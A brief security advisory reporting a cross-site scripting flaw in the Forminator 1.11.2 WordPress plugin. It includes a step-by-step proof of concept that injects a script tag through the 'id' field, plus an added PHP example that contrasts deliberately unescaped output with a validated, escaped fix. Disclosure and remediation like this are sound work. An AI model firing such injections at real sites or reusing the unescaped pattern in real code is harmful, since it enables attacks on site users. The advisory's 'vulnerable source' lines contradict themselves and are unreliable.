WordPress Forminator 1.11.2 Cross Site Scripting

WordPress Forminator plugin version 1.11.2 suffers from a cross site scripting vulnerability.



[-] Title  : WordPress plugin Forminator 1.11.2 - Cross Site Scripting
[-] Author : MEHRAN_FEIZI
[-] Vendor : https://wordpress.org/plugins/forminator/
[-] Category : Webapps
[-] Date : 2020-02-20
==============================================================================================
Vulnerable Page:
forminator/admin/views/custom-form/popup/export.php
==============================================================================================
Vulnerable Source:
46: echo echo esc_attr($form_id);
2: $form_id = $_POST['id'];
===============================================================================================
POC :
http://localhost/wp-content/plugins/forminator/admin/views/custom-form/popup/export.php

Step 1 = Go to the web page:
http://localhost/wp-content/plugins/forminator/admin/views/custom-form/popup/export.php

Step 2 = In the box: "id"

Step 3 = In the input box, add JavaScript code: <script>alert('XSS')</script>
===============================================================================================
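An added example, not part of the original advisory and not Forminator's code: the $_POST['id'] to echo flow from the "Vulnerable Source" lines, shown unescaped beside a validated and escaped form. The function names, the hidden-input markup and the sample inputs are assumptions; it is plain PHP so it runs without WordPress, where absint() and esc_attr() play the same roles.

```php
<?php
// Added example, not Forminator code. Inside a plugin, a view file would also
// start with:  defined( 'ABSPATH' ) || exit;   so it cannot be requested directly.

// "Before": request value copied into the markup unchanged (source -> sink).
function render_unsafe(array $post): string
{
    $form_id = $post['id'] ?? '';
    return '<input type="hidden" name="id" value="' . $form_id . '">';
}

// Accept only a positive decimal integer; anything else is rejected.
function validated_form_id(array $post): ?int
{
    $raw = $post['id'] ?? null;
    if (!is_string($raw)) {
        return null; // missing, or an array such as id[]=1
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// "After": validate on input, escape on output for the HTML attribute context.
function render_safe(array $post): string
{
    $form_id = validated_form_id($post);
    if ($form_id === null) {
        return ''; // render nothing for an invalid id
    }
    $escaped = htmlspecialchars((string) $form_id, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="id" value="' . $escaped . '">';
}

// Constructed sample inputs: the advisory's test string, a normal id,
// an array-valued id and a request with no id at all.
$samples = [
    ['id' => "<script>alert('XSS')</script>"],
    ['id' => '42'],
    ['id' => ['1']],
    [],
];
foreach ($samples as $post) {
    echo 'in:     ', json_encode($post), "\n";
    if (is_string($post['id'] ?? null)) {
        echo 'before: ', render_unsafe($post), "\n";
    }
    echo 'after:  ', render_safe($post) ?: '(rejected)', "\n";
}
```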
************************
* ==> Contact Us :
* Telegram : @MF0584
* Email : [email protected]
************************
